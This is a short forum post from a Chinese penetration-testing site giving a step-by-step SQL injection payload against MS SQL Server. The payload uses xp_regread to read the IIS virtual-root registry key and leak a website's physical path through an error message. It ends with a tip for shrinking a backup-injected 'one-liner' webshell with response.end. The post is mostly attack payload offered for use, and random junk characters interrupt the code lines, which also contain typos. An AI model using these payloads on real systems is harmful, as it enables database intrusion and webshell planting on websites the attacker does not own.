中国网络渗透测试联盟

标题: DB权限暴出网站物理路径代码 [打印本页]
作者: admin    时间: 2012-9-15 14:23
标题: DB权限暴出网站物理路径代码
1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 创建表' n: z( D, ~7 W- f3 M
0 ~. D& N! S% w4 t+ ?: K5 r: `% B+ b
6 m% ?1 Q  \2 G! L+ ]
  2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’-- 将网站目录插到表字段中
8 ?& g$ _( D1 ]! E% b% {; h. t1 n( W; }5 h5 O4 k6 [& Q
* B# @) o+ [1 o7 `5 n
  3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data] desc)=0 ’//暴出字段( J8 N# F1 O  c
6 W4 n5 S8 a7 @: z  j

# s" F+ x% h  h( L, w/ a+ N" Y8 v  4、drop table [jm_tmp]-- 删除此表。7 M/ p. L) K; W5 \( `& {, y
- D7 L' z1 W7 k2 _

: t/ Q! {0 J0 X& ^另附上备分专用一句话
2 E( }6 D. u" }* w  加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.
1 K/ s% \5 }, G5 ?, ~4 V



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2